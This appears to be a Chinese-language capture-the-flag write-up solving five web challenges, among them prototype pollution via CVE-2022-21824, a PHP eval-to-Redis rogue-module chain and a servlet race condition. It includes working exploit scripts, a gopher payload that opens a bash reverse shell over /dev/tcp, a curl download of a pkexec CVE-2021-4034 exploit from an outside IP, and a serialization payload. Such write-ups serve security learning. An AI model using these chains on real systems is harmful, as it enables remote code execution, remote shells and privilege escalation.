GameV4.0
flag在data.js源码中 base64解码即可
gocalc0
随便发点payload测试下发现返回的session解码就有flag了
预期解:https://blog.csdn.net/cosmoslin/article/details/122930836
newcalc0
使得Object.prototype这条件达成即可获取flag 猜测原型链污染 这里还有console.log
使用cve-2022-21824
console.table([{
x:1}], ["__proto__"]);
提交后 访问/flag即可
InterestingPHP
禁用了许多函数phpinfo都没了 读写文件只有在当前目录
/?exp=print_r(scandir("./"));查看当前目录下文件
有个配置文件 /?exp=highlight_file('secret.rdb'); 查看得到redis key
使用redis 加载模块的方式rce https://xz.aliyun.com/t/5665#toc-14
import requests
url = "http://8c7c47d3-ff45-4aea-8a5e-a2d363a1eb5d.node4.buuoj.cn:81/?exp=eval($_POST[1]);"
headers = {
"content-type": "application/x-www-form-urlencoded"}
def encoder_url(data):
encoder = ""
for single_char in data:
encoder += str(hex(ord(single_char)))
encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
return encoder
so = "http://ip:7777/exp.so"
payload = '''
function getSslPage($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
$result = curl_exec($ch);
curl_close($ch);
file_put_contents("exp.so",$result);
}
getSslPage("%s");
'''.strip()
data = {
1: payload % so
}
fh = requests.post(url, data, headers=headers).text.strip()
print(fh)
gopher = "gopher://127.0.0.1:8888/_"
data = '''
auth ye_w4nt_a_gir1fri3nd
config set dbfilename 666.rdb
module load ./exp.so
system.exec 'bash -c "bash -i >& /dev/tcp/ip/7999 0>&1"'
'''
encoder = encoder_url(data)
payload1 = gopher + encoder
data1 = {
1:payload % payload1
}
fh1 = requests.post(url,data1,headers=headers).text.strip()
print(fh1)
https://github.com/n0b0dyCN/redis-rogue-server 用的这里的so文件
使用脚本前先将so文件放到vps上 然后开启个http服务
python3 -m http.server 7777
获得shell会发现读取flag没有权限 使用pkexec最近的提权漏洞
https://github.com/arthepsy/CVE-2021-4034 将cve-2021-4034-poc.c丢到vps上
然后在靶机上执行
curl http://118.31.76.240:7777/cve-2021-4034-poc.c > cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
easyJava[复现]
直接读文件 web.xml没啥信息 读取classes目录下的就行
/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes
先看HelloWorldServlet,要获取flag就得使得key的值正确且反序列化出来的user对象属性值要与this.user当中一致
先看如何获取key 在doGet函数中 if 和 else当中的判断相同 冲突
要想获取key 只能通过条件竞争 才能在上面的判断中不成立 进入else后得到正确的name
Servlet的线程安全问题
# -*- coding: UTF-8 -*-
import requests
import threading
host = "http://aafc6475-042c-4bf7-827e-4f577bb2838d.node4.buuoj.cn:81/"
class myThread (threading.Thread):
def __init__(self, name):
threading.Thread.__init__(self)
self.name = name
def run(self):
print ("开始线程:" + self.name)
runing(self.name)
print ("退出线程:" + self.name)
def runing(name):
while True:
r = requests.get(host+"/evi1?name=%s" % name)
r.encoding = "utf-8"
if r.text.find("The Key is")!=-1:
print(r.text)
return 0
# 创建新线程
thread1 = myThread("asdqwer")
thread2 = myThread("vnctf2022")
# 开启新线程
thread1.start()
thread2.start()
thread1.join()
thread2.join()
然后就是要满足this.user.equals(u) 直接序列化一个就行
package Payload;
import entity.User;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.Base64;
import util.SerAndDe;
public class Ser {
public static void main(String[] args) throws IOException {
User user = new User("m4n_q1u_666","666","180");
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(user);
byte[] ser = bos.toByteArray();
Base64.Encoder encoder = Base64.getEncoder();
String encodedText = encoder.encodeToString(ser);
System.out.println(encodedText);
User user2 = (User) SerAndDe.deserialize(ser);
System.out.println(user2);
}
}
最后提交key和生成的base64即可
